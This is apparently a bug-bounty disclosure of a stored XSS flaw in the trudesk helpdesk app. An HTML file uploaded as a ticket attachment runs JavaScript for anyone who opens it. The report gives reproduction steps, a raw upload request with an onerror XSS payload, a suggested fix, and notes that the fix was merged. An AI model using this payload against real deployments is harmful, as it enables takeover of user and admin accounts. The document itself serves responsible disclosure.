Least Privilege Violation in polonel/trudesk

Valid
Reported on Jun 15th 2021

💥 BUG

Stored XSS via file upload

💥 IMPACT

Stored XSS allows execution of arbitrary JavaScript in the victim's trudesk account. An external user can also execute XSS in an admin account here.

💥 STEPS TO REPRODUCE

1. First, as admin, go to http://localhost:8118/teams and create a team called team2.
Now go to http://localhost:8118/accounts/agents and add a new user called user B with the support role and assign him to the above team2.

2. Now, as an external user, go to http://localhost:8118/newissue and create a new ticket.

3. Now user B goes to his account, where he can see the above public ticket.
User B can upload an attachment to this ticket.
Here user B can attach any file, including HTML, and an HTML file can execute JavaScript.
When uploading an HTML file, the request below is sent to the server:

POST /tickets/uploadattachment HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34732645982285409509843513490
Content-Length: 409
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=EzJ4Vn6dOVHG5S_8AAAJ; $trudesk%3Asidebar%3Aexpanded=false

-----------------------------34732645982285409509843513490
Content-Disposition: form-data; name="ticketId"

60c632a56e8507002262a20a
-----------------------------34732645982285409509843513490
Content-Disposition: form-data; name="attachment"; filename="exif.html"
Content-Type: text/html

xss"'><img src=x onerror=alert(document.domain)>
-----------------------------34732645982285409509843513490--

After uploading, the user can access the uploaded file using a URL like http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/attachment_exif.html.
If any user opens this file, the XSS is executed.

SUGGESTED FIX

When serving an uploaded file, don't render it. You can use the Content-Disposition: attachment; filename="filename.html" header to prevent the browser from rendering an HTML file; it will ask the user to download the file instead.

Chris Brame validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty: $25
The fix bounty is now up for grabs: $6.25
Chris Brame confirmed that a fix has been merged on 25c5ae a month ago
Chris Brame has been awarded the fix bounty: $6.25